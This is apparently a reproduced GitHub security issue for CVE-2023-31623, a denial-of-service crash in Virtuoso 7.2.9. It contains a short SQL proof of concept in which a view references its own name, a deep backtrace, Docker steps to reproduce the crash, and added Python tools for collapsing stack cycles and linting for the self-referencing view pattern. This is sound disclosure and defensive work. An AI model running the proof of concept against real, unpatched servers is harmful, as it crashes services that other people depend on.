Headline
CVE-2023-31623: virtuoso 7.2.9 crashed at mp_box_copy · Issue #1131 · openlink/virtuoso-opensource
An issue in the mp_box_copy component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
The PoC is generated by my DBMS fuzzer.
CREATE TABLE t1( x INTEGER PRIMARY KEY, k VARCHAR );
CREATE VIEW t1 AS SELECT k, k FROM t1;
UPDATE t1 SET k = k-1 WHERE k > 100 AND x = 128;
backtrace:
#0 0xe086e9 (mp_box_copy+0x9)
#1 0xe08dd0 (mp_box_copy_tree+0xc0)
#2 0x815b3a (sqlc_col_to_view_scope+0x4fa)
#3 0x815ee2 (sqlc_exp_to_view_scope+0x162)
#4 0x815ee2 (sqlc_exp_to_view_scope+0x162)
#5 0x815ee2 (sqlc_exp_to_view_scope+0x162)
#6 0x815ee2 (sqlc_exp_to_view_scope+0x162)
#7 0x815ee2 (sqlc_exp_to_view_scope+0x162)
#8 0x815ee2 (sqlc_exp_to_view_scope+0x162)
#9 0x815ee2 (sqlc_exp_to_view_scope+0x162)
#10 0x815ee2 (sqlc_exp_to_view_scope+0x162)
#11 0x815ee2 (sqlc_exp_to_view_scope+0x162)
#12 0x815ee2 (sqlc_exp_to_view_scope+0x162)
…
#1045 0x815ee2 (sqlc_exp_to_view_scope+0x162)
#1046 0x815ee2 (sqlc_exp_to_view_scope+0x162)
#1047 0x815ee2 (sqlc_exp_to_view_scope+0x162)
#1048 0x817c90 (sqlc_update_view+0xa60)
#1049 0x7ddad0 (sqlc_update_searched+0xbd0)
#1050 0x817cd1 (sqlc_update_view+0xaa1)
#1051 0x7ddad0 (sqlc_update_searched+0xbd0)
#1052 0x817cd1 (sqlc_update_view+0xaa1)
#1053 0x7ddad0 (sqlc_update_searched+0xbd0)
#1054 0x817cd1 (sqlc_update_view+0xaa1)
#1055 0x7ddad0 (sqlc_update_searched+0xbd0)
#1056 0x817cd1 (sqlc_update_view+0xaa1)
…
#3132 0x817cd1 (sqlc_update_view+0xaa1)
#3133 0x7ddad0 (sqlc_update_searched+0xbd0)
#3134 0x817cd1 (sqlc_update_view+0xaa1)
#3135 0x7ddad0 (sqlc_update_searched+0xbd0)
#3136 0x6b7212 (sql_stmt_comp+0x812)
#3137 0x6ba122 (sql_compile_1+0x1a62)
#3138 0x7c8cd0 (stmt_set_query+0x340)
#3139 0x7cabc2 (sf_sql_execute+0x922)
#3140 0x7cbf4e (sf_sql_execute_w+0x17e)
#3141 0x7d4c0d (sf_sql_execute_wrapper+0x3d)
#3142 0xe1f01c (future_wrapper+0x3fc)
#3143 0xe2691e (_thread_boot+0x11e)
#3144 0x7f2025e0d609 (start_thread+0xd9)
#3145 0x7f2025bdd133 (clone+0x43)
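The trace above is over 3000 frames deep, and nearly all of it is two repeating patterns: sqlc_exp_to_view_scope calling itself (frames #3 to #1047) and sqlc_update_view / sqlc_update_searched alternating (frames #1048 to #3135), which is what you would expect when a view named t1 is expanded and resolves back to itself. The crash in mp_box_copy at the top is where the stack finally ran out, not where the bug lives. When triaging fuzzer output like this, the first thing to do is collapse the repeated cycles so the recursion is visible at a glance. The following script is an added example written for this page, not code from the issue or from Virtuoso; the backtrace it parses is a constructed, abbreviated excerpt of the one above (the long "…" runs are shortened to a few frames), and the frame format it expects is the "#N 0xADDR (symbol+off)" shape shown in the report.

```python
import re
from typing import Dict, List, Tuple

# Constructed, abbreviated excerpt of the backtrace from the issue: the
# full trace has 3146 frames; the elided runs are shortened here so the
# example stays small while keeping the same two cycles.
SAMPLE_BACKTRACE = """
#0 0xe086e9 (mp_box_copy+0x9)
#1 0xe08dd0 (mp_box_copy_tree+0xc0)
#2 0x815b3a (sqlc_col_to_view_scope+0x4fa)
#3 0x815ee2 (sqlc_exp_to_view_scope+0x162)
#4 0x815ee2 (sqlc_exp_to_view_scope+0x162)
#5 0x815ee2 (sqlc_exp_to_view_scope+0x162)
#6 0x815ee2 (sqlc_exp_to_view_scope+0x162)
#7 0x817c90 (sqlc_update_view+0xa60)
#8 0x7ddad0 (sqlc_update_searched+0xbd0)
#9 0x817cd1 (sqlc_update_view+0xaa1)
#10 0x7ddad0 (sqlc_update_searched+0xbd0)
#11 0x817cd1 (sqlc_update_view+0xaa1)
#12 0x7ddad0 (sqlc_update_searched+0xbd0)
#13 0x6b7212 (sql_stmt_comp+0x812)
#14 0x6ba122 (sql_compile_1+0x1a62)
#15 0x7c8cd0 (stmt_set_query+0x340)
"""

# "#N 0xADDR (symbol+0xOFF)"; the +offset part is optional.
FRAME_RE = re.compile(r"^#(\d+)\s+0x[0-9a-fA-F]+\s+\(([^+)]+)(?:\+0x[0-9a-fA-F]+)?\)")


def parse_frames(text: str) -> List[str]:
    """Return the symbol of every frame, innermost (#0) first."""
    frames = []
    for line in text.splitlines():
        m = FRAME_RE.match(line.strip())
        if m:
            frames.append(m.group(2))
    return frames


def collapse_cycles(frames: List[str], max_period: int = 4) -> List[Tuple[Tuple[str, ...], int]]:
    """Run-length encode consecutive repeats of short frame cycles.

    At each position try periods 1..max_period and keep the one that
    covers the longest stretch; a cycle of period 2 captures mutual
    recursion such as A -> B -> A -> B.  Returns (cycle, repeat_count).
    """
    out: List[Tuple[Tuple[str, ...], int]] = []
    i, n = 0, len(frames)
    while i < n:
        best_p, best_reps = 1, 1
        for p in range(1, max_period + 1):
            if i + p > n:
                break
            unit = frames[i:i + p]
            reps = 1
            while frames[i + reps * p:i + (reps + 1) * p] == unit:
                reps += 1
            if reps >= 2 and reps * p > best_reps * best_p:
                best_p, best_reps = p, reps
        out.append((tuple(frames[i:i + best_p]), best_reps))
        i += best_p * best_reps
    return out


def recursion_report(text: str, min_repeats: int = 3) -> Dict[str, object]:
    """Summarise a backtrace: total depth, collapsed cycles, and the
    cycles repeated often enough to look like runaway recursion."""
    frames = parse_frames(text)
    cycles = collapse_cycles(frames)
    runaway = [(c, k) for c, k in cycles if k >= min_repeats]
    return {"depth": len(frames), "cycles": cycles, "runaway": runaway}


if __name__ == "__main__":
    report = recursion_report(SAMPLE_BACKTRACE)
    print("depth:", report["depth"])
    for cycle, count in report["cycles"]:
        print(f"{count:>5} x {' -> '.join(cycle)}")
```

On the real trace the same code reports one period-1 cycle of about 1045 repeats and one period-2 cycle of about 1044 repeats, which is enough to classify the crash as stack exhaustion from unbounded view expansion before opening a debugger. The parser only understands the one frame format shown in the report; gdb's "#N addr in symbol (args) at file:line" style would need a second regex.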
ways to reproduce (write the PoC to the file '/tmp/test.sql' first):
# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait for the server to start
sleep 10
# check whether a simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
docker exec -i virtdb_test isql 1111 dba < "/tmp/test.sql"
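The shape of the PoC is simple: a CREATE VIEW whose name is the same as the table it selects from, so the view effectively refers to itself, followed by an UPDATE against that name. The fix is the server-side patch (see the Ubuntu notice below); there is nothing a client can do about the compiler recursion itself. What a practitioner running a fuzzing harness or a SQL gateway in front of an unpatched 7.2.9 can do is refuse statements with this shape before they reach the server. The linter below is an added example written for this page, not code from the issue or from Virtuoso; it is a heuristic that recognises this specific pattern (a view referencing its own name, or a view whose name collides with a table created in the same script), not a general SQL parser, and the statement splitting on ';' assumes no semicolons inside string literals.

```python
import re
from typing import Dict, List, Set

# The PoC from the issue, embedded here as test input.
POC_SQL = """
CREATE TABLE t1( x INTEGER PRIMARY KEY, k VARCHAR );
CREATE VIEW t1 AS SELECT k, k FROM t1;
UPDATE t1 SET k = k-1 WHERE k > 100 AND x = 128;
"""

CREATE_TABLE_RE = re.compile(r"^\s*CREATE\s+TABLE\s+([\w.]+)", re.I)
# CREATE VIEW name [(col, ...)] AS <body>
CREATE_VIEW_RE = re.compile(
    r"^\s*CREATE\s+VIEW\s+([\w.]+)\s*(?:\([^)]*\))?\s+AS\s+(.*)$", re.I | re.S
)
# Table names following FROM or JOIN, including comma-separated lists.
FROM_RE = re.compile(r"\b(?:FROM|JOIN)\s+([\w.]+(?:\s*,\s*[\w.]+)*)", re.I)


def split_statements(script: str) -> List[str]:
    """Naive split on ';' (assumes no semicolons inside literals)."""
    return [s.strip() for s in script.split(";") if s.strip()]


def referenced_tables(select_body: str) -> Set[str]:
    """Lower-cased names that appear after FROM / JOIN in a SELECT."""
    refs: Set[str] = set()
    for m in FROM_RE.finditer(select_body):
        for name in m.group(1).split(","):
            refs.add(name.strip().lower())
    return refs


def lint_views(script: str) -> List[Dict[str, object]]:
    """Flag CREATE VIEW statements that reference their own name or
    reuse the name of a table created earlier in the same script."""
    findings: List[Dict[str, object]] = []
    tables: Set[str] = set()
    for idx, stmt in enumerate(split_statements(script), 1):
        m = CREATE_TABLE_RE.match(stmt)
        if m:
            tables.add(m.group(1).lower())
            continue
        m = CREATE_VIEW_RE.match(stmt)
        if not m:
            continue
        name = m.group(1).lower()
        refs = referenced_tables(m.group(2))
        if name in refs:
            findings.append({"statement": idx, "view": name,
                             "issue": "view references itself"})
        if name in tables:
            findings.append({"statement": idx, "view": name,
                             "issue": "view name collides with a table in this script"})
    return findings


if __name__ == "__main__":
    for f in lint_views(POC_SQL):
        print(f"statement {f['statement']}: view {f['view']}: {f['issue']}")
```

Run against the PoC this reports both findings for statement 2; a benign script that creates t1 and then a view v1 over it produces none. Because the check runs before the server sees the script, it is only useful where the client side is trusted to enforce it (a fuzzer harness deciding what to send, a proxy in front of the database); it does not help against a caller who connects to isql directly, and it does not cover other ways a view can end up resolving to itself, such as through a chain of views.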
Related news
Ubuntu Security Notice 6832-1 - Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. This issue only affects Ubuntu 22.04 LTS, Ubuntu 23.10 and Ubuntu 24.04 LTS.